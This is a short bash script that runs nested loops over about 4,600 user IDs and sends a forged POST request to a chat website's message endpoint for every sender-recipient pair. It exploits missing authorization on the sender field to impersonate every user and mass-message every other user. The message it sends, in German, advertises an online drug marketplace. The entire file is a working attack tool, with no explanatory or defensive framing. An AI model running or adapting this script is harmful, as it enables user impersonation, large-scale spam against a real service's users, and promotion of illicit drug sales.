#!/bin/bash

for sender in {1..4613}
do
    for recipient in {1..4613}
    do
        echo "userId=$recipient&senderId=$sender"
        curl 'https://schwurbeltreff.de/android12/sendMessage.php' -X POST -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Referer: https://schwurbeltreff.de/chat.php?userId=88&code=4895296580' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Origin: https://schwurbeltreff.de' -H 'Connection: keep-alive' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' --data-raw "benutzername=meisterschwurbler&userId=$recipient&senderId=$sender&nachricht=Probieren+Sie+https%3A%2F%2Farchetyp.cc+um+Drogen+zu+kaufen.+Online%2C+anonym+und+privat.&nachrichtEncrypted=U2FsdGVkX18LXCyZzYg%2FZ%2FHCZ41R9trQR89Qe4hRwGJSZjJT41i8SP0qCENbLBZKqJW88YCPS%2Fj2fFeNqgj%2BlH6kOlZyEPpeSOwA5G0ih0eaI1ljr5ogrgG1JaA6F4GlOC4FqyCBISdlZDwt%2BKdgNQ%3D%3D&astromatch=0&test=1"
    done
done